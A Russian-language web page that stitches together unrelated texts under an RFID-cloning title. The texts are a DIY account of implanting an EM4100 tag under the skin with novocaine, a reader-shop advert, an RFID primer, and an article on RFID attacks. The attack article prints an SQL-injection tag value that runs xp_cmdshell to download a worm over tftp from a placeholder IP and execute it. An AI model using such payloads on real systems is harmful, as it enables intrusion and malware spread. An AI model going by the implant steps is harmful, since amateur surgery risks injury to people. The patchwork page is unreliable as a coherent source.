Клонирование rfid ключа. Классификация ключей и возможность восстановления. Как это выглядит сейчас

  • Биотехнологии ,
  • Носимая электроника ,
  • DIY или Сделай сам

    • Мне всегда нравилась идея ключа, который невозможно забыть. А если при этом ключ еще и подходит к стандартным замкам - прекрасно вдвойне.

    Поэтому, как только появилась возможность разместить под собственной кожей RFID, совместимый хоть с чем-нибудь общеупотребимым, я это и сделал, имплантировав метку EM4100 - множество дешевых замков и систем контроля доступа используют его.

    А когда обнаружилась метка, совместимая с NFC - и способная быть ключом к ноутбукам, смартфонам и оставшимся замкам - избегать ее встраивания причин решительно не было.

    ВНИМАНИЕ! Данная публикация не является инструкцией, рекомендацией, руководством к действию и предназначена только для ознакомления. Повторение нижеизложенного может быть смертельно опасно или привести к осложнениям и травмам. Автор не рекомендует производить описанные действия на себе и не несет ответственности за любые последствия, вызванные прочтением публикации.

    RFID

    RFID - Radio Frequency IDentification - технологии беспроводной идентификации пользователей, оборудования. Существует большое количество совершенно разных технологий, отличающихся рабочей частотой (868 МГц, 13,56 МГц, 125 кГц и др.), кодированием, возможностью чтения-записи или только чтения, дальностью действия, наличием батарейки, назначением.

    Считыватель, reader - активное устройство считывания меток, посылает регулярные запросы в виде электромагнитных волн в окружающее пространство. Может быть автономным со свой памятью и возможностью сразу управлять, например, замком; или же передавать данные по RS-485, USB или другим образом.

    Метка, ключ, тег, tag - устройство, содержащее уникальный идентификатор, и, иногда, область данных. Может быть встроенное шифрование, выполнение кода, другие возможности. Чаще не содержит батареек и питается от ЭМ волн, излучаемых считывателем.

    Стандарт EM4100

    Стандарт бесконтактных радиочастотных идентификационных карт компании EM Microelectronic-Marin. Работают на частоте 125 кГц.

    Имеют уникальный номер длиной 40 бит, которые и передают вместе со служебными байтами циклично в открытом виде. Шифрования и хранения пользовательских данных, как и возможности записи - нет (официально, неофициально давно уже есть болванки карт, куда можно записать произвольный номер). Очевидно, для серьезной защиты хоть чего-нибудь не подходят совершенно. Однако, довольно широко применяются в простых СКД, домофонах вместо таблеток Dallas, дешевых контроллерах электромагнитных замков и подобных вещах. Ключи могут выглядеть как пластиковый брелок, гибкая или твердая пластиковая карта или по-другому.

    Вот, например, контроллер замка с клавиатурой и десяток ключей к нему за $10.

    Имплантируемые метки EM4100

    Основные требования к имплантируемому устройству:
    • Небольшой размер, чтобы слишком не торчало под кожей
    • Обтекаемая форма, чтобы не повреждало кожу изнутри
    • Биоинертный материал - чистый силикон, стекло
    • Герметичность, прочность и стойкость к стерилизации
    RFID-метки хорошо подходят для вживления, так как им не требуются сменные или заряжаемые источники питания, контакты, разъемы. В 2011 году почему-то было довольно трудно найти метки, которые пригодны для имплантирования и при этом - совместимы с чем-нибудь широкоупотребимым. Продавались или метки ЕМ4100 в виде брелков, карт, дешевые и огромного размера, или же имплантируемые метки для учета животных, которые можно считать только специальным считывателем. EM4100 или совместимых в стеклянной капсуле - не было.

    Но все оказалось не так плохо! По запросам em4100 glass, em4102 glass, rfid glass удалось найти что-то похожее на eBay и сразу это заказать. Пришли два набора меток, вот такие (левое фото - моё, правое - rss-systems.de):

    Первыми я получил те, что слева, и расстроился от их размера. Они оказались больше, чем на фото, при этом не из стекла и не совсем округлой формы. К счастью, за ними приехали и другие, оказавшиеся стеклянными гладкими капсулами примерно 12 мм длинной и 3 мм в диаметре. Их и было решено вживить.

    Процесс имплантации метки под кожу


    Какое-то время занял поиск человека, готового взяться за имплантацию. В принципе, я был готов сделать это и сам, если никого не найдется, или доверить другу-ветеринару, но все оказалось проще. Знакомый врач (по специальности - врач общей практики, но, как и все врачи, конечно, умеющий накладывать швы, делать подкожное обезболивание и разрезы) согласился все сделать в лучшем виде, и летом 2013 года мы закупили необходимые материалы (новокаин, антисептики, несколько медицинских инструментов, стерильные скальпели и иглы с нитью) и приступили.

    Вот что мы сделали:

    • Стерилизация меток. Так как метки пришли не стерильными, было необходимо их стерилизовать. Для этого метка была тщательно вымыта, затем в течение часа метка находилась в йодном растворе, непосредственно перед помещением под кожу были промыты сначала спиртом, потом стерильной водой для инъекций.
    • Стерилизация инструментов. Скальпели, перчатки, наборы из иглы и нити уже были стерильными (и одноразовыми), а вот стальной пинцет и лопатка, необходимая, чтобы создать в подкожной клетчатке пространство под метку, требовали стерилизации. Доступа к автоклаву не было, так что пришлось использовать химический способ стерилизации. Мы использовали «пюржавель» в высокой концентрации. Это плохо влияет на инструменты (вызывает коррозию даже нержавеющей хирургической стали), но зато доступно и вполне работает.
    • Обезболивание. Инфильтрационная анестезия новокаином - вводим раствор новокаина 20 мг/мл подкожно в предполагаемое место разреза и подождать в течение 5-10 минут для проникновения в окружающие ткани. Осторожнее с новокаином - при наличии у вас аллергии и\или кривых рук может вызвать множество самых неприятных последствий, вплоть до смертельного исхода! Не делайте этого самостоятельно, если вы не врач.
    • Выбор места размещения метки. Обычно мелкие предметы имплантируют в пространство между большим и указательным пальцами руки (примерно туда, где находится метка на КДПВ) - меньше всего шансов повредить ее при работе руками с чем-нибудь. По этим же причинам была выбрана левая рука.
    • Разрез и размещение метки. Кожу трижды протерли спиртом. Разрез сделали обычным одноразовым скальпелем, примерно 5 мм в длину, предварительно натянув кожу. Так как под местом разреза к этому моменту уже находится «пузырь» из раствора новокаина, не ошибиться с глубиной довольно просто. Затем стоматологической лопаткой (лопатка шириной миллиметров 5, длиной 30 и на ручке) отделили кожу от клетчатки и пинцетом просунули туда метку. Чтобы ее не выдавило обратно, метка должна оказаться на расстоянии 1-2 см от разреза, а не впритык.
    • Завершение. Так как разрез был мал, зашивать его не было смысла, ограничились обработкой раны перекисью водорода и наложением стерильного пластыря. Также я принял внутрь дозу антибиотика широкого спектра действия, чтобы снизить вероятность воспаления, если что-то все-таки не получилось простерилизовать достаточно хорошо.

    Заживление проходило без каких-либо проблем, больших опухлостей, гематом, воспалений. В течение трех дней я пил антибиотик и менял пластырь, промывая место разреза хлоргексидином, затем снял его. Метка прощупывалась под кожей, не причиняла какого-то дискомфорта, и - самое главное - работала!

    Вот так место разреза выглядело на второй день



    Еще через год я добавил к имеющейся метке EM4100 вторую, NFC-совместимую, которую можно считывать смартфоном и вообще использовать много как. Об этом расскажу во второй части статьи (если это вызовет интерес, конечно).

    Как это выглядит сейчас

    Если не растягивать кожу специально, заметить метки трудно:

    Каких-либо проблем, осложнений не возникало, в том числе при работе руками, падениях и прочих опасных действиях.

    Для чего использовать?

    Я использую эту метку для того же, для чего и хотел - в качестве электронного ключа в свою комнату, в офис. Надежность самого стандарта невысока, но, как правило, электромагнитный замок - не основной, а только вспомогательный. У нас в офисе, например, он используется днем, а на ночь, когда все уходят, дверь запирается еще на механический ключ и помещение ставится на охрану. Так что вполне хватает и EM4100.

    Процесс открытия замка (руку нужно держать тыльной стороной к считывателю, так как дальность действия совсем маленькая):

    Доступ в квартиру, комнату, машину, служебное помещение. Простое подтверждение каких-либо действий. Для серьезной безопасности конкретно эта метка не подходит (см. выше), но более менее подходит NFC-совместимая, о ней во второй части.

    Наблюдения и замечания

    • Метки никак не ощущаются, не мешают работе рукой, за почти два года ничего не сломалось.
    • В металлоискателях ничего не пищит.
    • Иметь ключ от дверей всегда с собой, особенно от захлопывающихся - действительно удобно.
    • Расстояние считывания - менее сантиметра, чаще всего это вообще должен быть контакт кожей. Поэтому сделать копию EM4100 не сложнее, чем копию карты, которая лежит в кармане. Нормальные NFC (ISO 14443) не копируются вообще + криптография внутри.
    • Нет, меня ни разу не беспокоит уникальный идентификатор в теле. В теле и так полно уникальных идентификаторов, еще больше мы носим с собой в виде техники и документов.
    • КДПВ не моя, взята

    С интерфейсом Wiegand, TM (dallas), RS485. Для карт 125 кГц, 13,56 кГц. С защитой объекта и защитой от клонов.

    Em-marine или HID и ключей – это электронное устройство, используемое для распознавания карт доступа, ключей, брелоков, браслетов и т.д.

    Одним из наиболее распространенных считаются считыватели Proximity карт. Надежность, простота в обращении и невысокая стоимость позволили считывателям Проксимити карт завоевать российский рынок довольно быстрыми темпами. Proximity – это считыватель бесконтактных карт, содержащий генератор, работающий на частоте 125 кГц и позволяющий считывать код на этих картах.

    Для обеспечения безопасности системы контроля доступом существуют различные производители считывателей электронных карт. Наибольшей популярностью пользуются следующие марки:

    • EM Marine

    Это наиболее популярные модели, которые предлагаются сегодня на рынке систем безопасности. Рассмотрим более подробно каждый из них.

    Считыватели EM Marine в настоящее время широко применяются в современных СКУД. Этому способствует большой спрос на бесконтактные карты EM Marin и достаточно низкая цена. Считыватель карт EM Marine работает на частоте 125 кГц.

    Считыватель HID карт – еще одно устройство идентификации для систем контроля доступа. Используется в качестве бесконтактного считывателя прокси карт, радиокарт, радиобрелоков, радиочастотных меток для автотранспорта и т.д. с расстояния от 7 до 60 см. Все считыватели HID для карт доступа оснащены светодиодной и звуковой индикацией для осуществления обратной связи с пользователем.

    Для считывания кодов ключей применяется считыватель Touch Memory . Используется для ключей в формате TM в домофонах, установленных на дверях жилых помещений, складов, офисов, гаражей и т.д. Для безопасности объекта, находящегося под защитой домофона, все жильцы, работники офисов и владельцы автомобилей должны иметь при себе электронные ключи. При присоединении данного устройства к считывателю ключей ТМ, электронный код ключа принимается или не принимается системой безопасности, установленной на домофоне.

    Считыватель электронных ключей Touch Memory – это современная и качественная защита любого помещения от проникновения внутрь лиц, не имеющих на это прав. Эффективность считывателей Тач Мемори проверена в различных климатических условиях: в жару до +50С и в морозы до -40С. Установив в электронные замки врезной или накладной считыватель Touch Memory, можно с легкостью пользоваться электронными ключами даже детям.

    Где купить дешевые считыватели Proximity и TM в Москве и Московской области?

    Интернет-магазин «Видеотехнология» предлагает большой выбор недорогих считывателей RFID Proximity и электронных ключей Touch Memory по низкой цене. У нас можно купить качественные уличные и внутренние считыватели бесконтактных карт и ключей со скидкой и доставкой по Москве и Подмосковью. В каталоге нашего сайта представлены лучшие модели 2013-2014 года. Чтобы узнать, сколько стоит считыватель Touch Memory и Proximity, позвоните нам или оставьте онлайн-заявку.

    читать далее

    Пока в стране идут новогодние праздники и все отдыхают наконец соберу весь накопленный материал в одну кучку. Я давно не писал в блог, постараюсь исправиться в нынешнем году. Я не пишу о политике, философии, событиях моей жизни, только о железках. Увы о железах на работе я писать не могу в силу определенных причин, но копится материал научно-популярного и просветительского толка. Очень сложно написать лучше, чем уже написано в той же википедии.

    RFID – R adio F requency ID entification – радиочастотная идентификация. На сегодня RFID метки это более широкое понятие и сюда приплетают в том числе и беспроводные сенсоры, хотя идентификация – не их основное занятие. RFID метка – это небольшое устройство, которое позволяет на расстоянии, в отсутствие прямой видимости считать сохраненные на нем данные, тем самым идентифицировать объект. Это как штрихкод, наклеенный на товар, только работающий по радио.

    RFID метки бывают разных типов. По способу электропитания различают пассивные (полностью получают питание для работы от излучения считывателя) и активные (имеют на себе батарейку). Само собой у пассивных дальность действия ниже, зато срок службы ничем не ограничен. У активных все лучше, и дальность действия, и начинка поинтеллектуальнее, но батарейку нужно будет менять.

    По радиочастотному диапазону различают LF (125 кГц), HF (13.56 МГц) и UHF (860-960 МГц).

    Принцип действия

    Считыватель и метка имеют катушки индуктивности, образующие колебательный контур. Когда считыватель создает переменное магнитное поле своей катушкой, магнитный поток проходя через катушку метки возбуждает в ней ток. Точно так же как работает к примеру беспроводная зарядка. Метка от возбужденного в катушке тока получает питание, и используя транзистор может на некоторое время (питаясь в это время от накопленного в конденсаторе заряда) замыкать катушку накоротко, тем самым меняя значение амплитуды тока в катушке считывателя. Считыватель фиксирует эти изменения, тем самым принимая сигнал от метки.

    Устройства UHF диапазона работают аналогично, только вместо катушек – диполи:

    (Иллюстрация из книги RFID Handbook by Klaus Finkenzeller 2 редакция)

    Само собой это означает что весь обмен данными между меткой и считывателем происходит публично, и при решении задач определения подлинности нужно это учитывать.

    Активные метки более разнообразны по устройству, некоторые вообще по сути являются радиомаяками, по несколько раз в секунду просто посылая в эфир свой номер (parsec). RFID метка помимо микроконтроллера, обеспечивающего передачу уникального номера может быть оснащена различными датчиками. Например датчиком давления. Такой датчик можно разместить в шину автомобиля и непрерывно контролировать давление воздуха в шине.

    С каждым днем RFID меткам находят все больше применений. Начиная от использования в качестве ключей для домофона заканчивая противокражными метками в магазинах самообслуживания. Именно увеличение спроса, снижение стоимости из-за массового производства позволяет находить все новые и новые применения.

    Метка передает считывателю в ответе на запрос свой уникальный номер. Более сложные метки имеют немного памяти на борту и могут хранить какую либо информацию, например количество оставшихся поездок, что избавляет от необходимости создания центрального сервера и поддержки его на связи всегда. Метка также может иметь на борту криптопроцессор и обеспечивать проверку подлинности или обмен секретными данными. Изучается вопрос добавления RFID меток к банкноты как дополнительная мера защиты.

    В будущем возможно все продукты будут снабжены RFID метками на стадии производства, а холодильник RFID считывателем. Тогда взяв вечером спросонья из холодильника пакет молока он молвит человеческим голосом “Сдурел? Выкинь, оно во мне уже пол года лежит, испортилось давно”.

    Примеры

    Екарта – проездная карточка на все виды транспорта в г.Екатеринбурге. Представляет собой карточку Mifare. Внешний вид:

    Немного ацетоновых ванн и видно катушку индуктивности по периметру. Система полностью децентрализованная и информация о количестве денег хранится на самой карте в зашифрованном виде.

    Московский метрополитен. Конструкция попроще для удешевления, карточка одноразовая:

    Брелок от домофона “Факториал”

    Внутри тоже RFID чип от Texas Instruments

    При этом при каждом открывании двери данные в ключе перезаписываются, таким образом невозможно увеличить количество ключей. Копия будет работать, но после первого открывания перестанет работать оригинал, так как данные в ключе меняются. Этим хитрым апгрейдом факториал разом сделал бизнес копирования домофонных ключей невозможным.

    Активные метки parsec

    Представляют собой герметичный контейнер с микроконтроллером, батарейкой и радиомодулем, который посылает в эфир пару раз в секунду свой уникальный номер. Закрепив такой на автомобиле можно определять какие авто на данный момент сейчас находятся к примеру в гараже. Основная задача этих меток в автоматическом открывании ворот и шлагбаумов.

    При этом вариант на последнем фото снабжен еще и пассивной меткой, можно повесить как брелок для ключей, и открывать не только ворота но и двери.

    Правда безопасность автомобиля, основанная на наличии такой метки уязвима .

    Если разберем ключ от автомобиля то найдем в нем чип иммобилайзера, который по сути тоже RFID метка:

    Справа на крышке. Надежность и секретность механических замков ограничивается точностью механической обработки и достигла своего предела. Электронные замки и ключи имеют значительно большее число комбинаций.

    RFID метки могут внедряться на стадии производства, например гитар:

    Производитель таким образом не только облегчает себе отслеживание продукции на складах, но и гарантирует себе способ отличить свою продукцию от подделок.

    Вот шапка с RFID меткой пришитой при производстве:

    Еще одна от куртки:

    Немного растворителей и достаем метки:

    Отдельного слова заслуживают так называемые противокражные метки, или 1-битные транспондеры. Это RFID метка которая передает всего 1 бит – информацию о своем наличии. Такие метки используются для защиты товара от краж. Я про одну такую. Чаще всего встречаются метки электромагнитной системы (метка – колебательный контур), и акустомагнитной. Метки других типов в наших краях встречаются редко.

    Если вы параноик

    Возможно вам пригодится RFID Zapper . Перманентно отключить метку можно также в микроволновке, просто включив на пару секунд. Пассивные метки считываются на расстоянии в несколько метров (для LF и HF вообще не более 20 см). Что бы считать метку на расстоянии 100 метров в считыватель придется закачивать неприлично большие мощности.

    Технология RFID

    Краткое описание технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью устройств, называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации, позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть также сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году. Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тэг). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный, который уже принимается антенной ридера. Внутри карты или брелка содержится антенна в виде катушки тонкого провода.

    По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя находится постоянно во времени (то есть не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора.

    Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга, и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-тэги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют активными, а те, что без него, — полупассивными.

    RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на:

    • низкочастотные (125 или 134,2 КГц);
    • высокочастотные (13,56 МГц);
    • UHF, то есть ультравысокочастотные (868-956 МГц);
    • микроволновые (2,45 ГГц).

    Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб. Кроме того, метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету.

    Применение: за и против

    Применяться RFID может в самых разных областях. Во-первых, СКУД, то есть системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом — уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13,56 МГц. Реально новое направление в этой области - создание RFID-имплантатов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку - VeriChip.

    Во-вторых, это контроль над перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах: достаточно пройтись с ридером вдоль полок с товарами — и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрихкодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением, как сегодня штрихкод.

    Еще одна очень важная область применения RFID - это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан. При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото.

    Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки по своей сути являются радиомаяками - ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения. Большие опасения вызывает безопасность самой технологии. Сам Брюс Шнайер на планы оснащения паспортов RFID-метками, заявил, что «это чистая угроза национальной безопасности».

    Конечно, такую важную технологию, как RFID, не могли оставить без внимания хакеры и различные исследователи информационной безопасности. Первое, на чем хотелось бы заострить внимание, — это проблема, связанная с вмешательством в личную жизнь человека, которая возможно будет иметь место в самом обозримом будущем. Только представь, что государство или же крупные корпорации будут иметь под контролем тысячи считывателей радиометок, расположенных на входе в метро, супермаркет или просто посреди улиц. Такие считыватели способны накапливать информацию о нашем перемещении, о том, какие товары мы только что приобрели в магазине. Конечно, сегодня это звучит несколько бредово, но пройдет, возможно, менее десятка лет, и наступит время, когда каждый из нас добровольно или же принудительно будет всегда носить с собой имплантированный под кожу идентификационный чип. Напоминает кино в жанре киберпанк? Как бы то ни было, все идет именно к этому.

    RFID и хакеры

    Австралийские исследователи компьютерной безопасности в апреле этого года опубликовали работу, в которой описывается возможность препятствования считыванию информации RFID-ридером с метки. В их планах — создание устройства, которое не позволит считывать информацию с RFID-меток без ведома их владельца. Они использовали метод, напоминающий DoS-атаку: радиоэфир захламляется огромным множеством сигналов, имитирующих сигналы меток. RFID-ридеры первого поколения, то есть пассивные, не имеют возможности считать данные с карты из-за вышеупомянутого явления - коллизии. Интересно, что более продвинутые интерактивные ридеры, как показали опыты, также напрочь уходят в даун.

    Но с созданием первого анти-RFID гаджета австралийцев опередили голландцы. В начале апреля на околокомпьютерных сайтах запестрила новость о разработанном сотрудниками Свободного университета Амстердама устройства, которое препятствует чтению RFID-меток и информирует владельца о подобных попытках. Данный девайс разрабатывался в рамках проекта RFID Guardian (https://www.rfidguardian.org) группой исследователей под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), который, кроме этого, занимается еще рядом проектов, посвященных безопасности RFID-систем. Разработанное голландцами устройство представляет собой КПК с 550Mhz процессором и 64 Мб памяти, оборудованный RFID-ридером и необходимым ПО.

    Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах «Хаоса», решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, — это простое уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженными хакерами, оказалось помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле, наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper"а обещают дальнейшее развитие проекта. RFID-Zapper вызвал у всех большой интерес на состоявшемся некоторое время назад европейском 22-м слете хакеров CCC.

    Клонирование

    Проблемы шифрования

    ExxonMobil - крупнейшая нефтяная корпорация, владеющая сетью бензозаправочных станций в США. Она внедрила на своих заправочных станциях инновационную платежную систему SpeedPass: оплата осуществлялась с помощью брелока с RFID-чипом внутри, на котором записаны данные о платежном счете его владельца в системе SpeedPass. Трое исследователей компьютерной безопасности — Стив Боно (Steve Bono), Мэтью Грин (Matthew Green) и Адам Стаблфилд (Adam Stubblefield) — конкретно взялись за изучение этой системы. RFID-чипы, использовавшиеся в этой системе, представляли собой разработку Texas Instruments под названием Digital Signature Transponder (DST).

    DST - это полупассивная радиометка с системой 40-битного шифрования. Хотя 40-битное шифрование сегодня достаточно легко вскрываются брутфорсом. Сложность вскрытия ключа заключалась в том, что сам алгоритм шифрования взломщикам был неизвестен. Но парням удалось восстановить его, используя различные криптоаналитические методы. Затем они собрали мощный кластер, который смог расшифровывать по 5 ключей менее чем за 2 часа. Позже было сконструировано устройство, эмулирующее работу DST, которое было проверено в действии на одной из станций ExxonMobil. После того как представители ExxonMobil ознакомились с результатами этого исследования (https://rfidanalysis.org), они заявили в прессе, что на практике все это не реализуемо, так как испытание «лабораторное». Но компания все же решила перестраховаться и перейти на чипы с 128-битным шифрованием.

    Посмотрим, как обстоит дело с криптозащитой электронных документов. Нидерландские спецы по информационной безопасности из фирмы Riscure первыми взломали прототип электронного паспорта, который собираются вводить в Евросоюзе. Удалось им это вследствие достаточно простого алгоритма, примененного для шифрования личных данных владельца. Такая информация, как день рождения владельца паспорта, серийный номер, срок окончания его действия, легко предсказуема, и помогла «взломщикам» расшифровать остальное содержимое памяти радиометки.

    Окончательно добил все представления о самой возможности безопасной RFID известнейший криптолог, профессор института Вейсмана Ади Шамир (Adi Shamir). Исследования ученый проводил на RFID-метках стандарта EPC (один из наиболее перспективных стандартов на сегодняшний день), работающих в UHF-диапазоне частот и использующих 8-ми и 32-битное шифрование данных. Для подбора ключа использовалась направленная антенна и цифровой осциллограф. Выяснилось, что при посылке чипу неверного бита ключа шифра энергопотребление RFID-чипа несколько возрастает, что может быть зафиксировано несложной аппаратурой. Таким образом, возможен взлом даже достаточно длинных ключей, причем в весьма короткое время. И это уже не проблема шифрования, а скорее проблема недоработки самой технологии RFID. Шамир представил также интересную идею о возможности создания девайса для расшифровки данных с UHF RFID-тэгов из обычного мобильника путем замены его ПО. Ведь GSM-мобилы и UHF-радиометки могут работать в одних и тех же частотах. Буду с нетерпением ждать, что получится из этой затеи.

    Подмена содержимого памяти RFID-меток

    Не спасает шифрование паспортов и от их клонирования. На завершившейся недавно хакерской конференции Defcon немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump , которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для пингвина. Для работы проги необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софтину время от времени кое-какие поправки. Например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а также проверка на ключи, выставляемые «по умолчанию». Скачать RFDump можно на сайте разработчиков: https://www.rf-dump.org.

    После создания своей проги Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным:). Дальше — больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна из десяти изученных ими RFID-система из не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту, открывающую любую дверь. Но и системы с шифрованием очень просто обойти: либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрихкодам. Хакеры получили возможность с помощью карманных компьютеров поменять метки дорогостоящих товарах на менее дорогие, «спасая» таким образом свою наличность. По словам Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимы.

    Атаки через RFID-метки

    Но несанкционированное чтение и клонирование меток — это еще не все. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID. Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы - здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow.

    Наиболее просто реализуема атака типа sql-injection. Допустим, приложение, работающее с RFID, записывает на метку какую-то информацию, например, если это коробка с товаром, говорящая о ее содержимом - «beer». Вот пример атаки на win-систему, уязвимую к sql-inj: хакер изменяет значение тэга на «beer"; EXEC Master..xp_cmdshell cd \Windows\Temp & tftp -i <здесь ip> GET worm.exe & worm.exe;» и загружает (конечно, если машина подключена к инету) таким образом червя в систему с БД товаров при считывании информации с метки.

    Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода «» в уязвимую linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете.

    Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тэгов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера, ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.

    Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. Там выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса, распространяющегося через RFID. И им это удалось: первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета. Вирус распространяется через RFID-метки и заражает БД систем, использующих RFID.

    Конечно, далеко не все RFID-системы подвержены подобного рода атакам. Таненбаум в своих исследованиях использовал не конкретную реализацию какой-то RFID-системы, а созданную для опытов лабораторную модель с модульной архитектурой, позволяющей изучать возможность атак на различные БД, используемых в реальных системах. И хотя производители RFID-систем подвергли критике исследования голландцев, думаю, с повсеместным распространением подобных систем окажется, что немалая их часть будет уязвима к разного рода хакерским атакам.

    Сегодня к уязвимостям технологии RFID, кроме хакеров и исследователей компьютерной безопасности, проявляют интерес и представители криминального мира: разного рода мошенники, автоугонщики, террористы. Пытаясь привлечь внимание к опасностям, скрывающимся в использовании этой прогрессивной технологии, хакеры даже продемонстрировали возможность использования RFID-сканера в качестве детонатора взрывного устройства, реагирующего на метку, встроенную в паспорт человека, которого необходимо ликвидировать.

    https://www.rfidguardian.org - сайт проекта RFID-Guardian

    https://www.rfidvirus.org - здесь можно найти информацию о возможности распространения разного рода malware-кода через RFID, наработки по написанию RFID-вирусов и троев.

    https://cq.cx - сайт эксперта по безопасности RFID-систем Джонатана Вестхьюза.

    https://rfidanalysis.org - проект по взлому DST.

    https://www.rf-dump.org - сайт создателей RFDump"а.



    Рекомендуем другие статьи
    Как праздновать летнее солнцестояние Эммануэль Дагер: Исцеляющее солнцестояние
    Как праздновать летнее солнцестояние Эммануэль Дагер: Исцеляющее солнцестояние
    Программирование микроконтроллеров AVR для начинающих Программирование контроллеров avr для начинающих
    Программирование микроконтроллеров AVR для начинающих Программирование контроллеров avr для начинающих
    Завис планшет - что делать?
    Завис планшет - что делать?